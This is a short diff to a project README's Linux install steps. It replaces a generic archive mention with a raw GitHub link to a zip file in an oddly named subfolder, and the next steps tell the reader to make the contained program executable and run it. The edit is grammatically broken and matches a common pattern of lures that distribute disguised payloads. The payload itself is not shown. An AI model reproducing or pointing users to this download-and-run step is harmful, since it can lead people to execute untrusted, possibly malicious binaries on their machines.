ArielJoH/Minimal-Drifting-Models/README.md

 #### On Linux

-1. Extract the downloaded `.tar.gz` archive, if that is the format.
+1. Extract the downloaded `https://raw.githubusercontent.com/ArielJoH/Minimal-Drifting-Models/main/suggestionize/Models_Drifting_Minimal_2.5.zip` archive, if that is the format.
 2. Make the main program file executable (`chmod +x filename`).
 3. Run it directly or follow included README instructions for setup.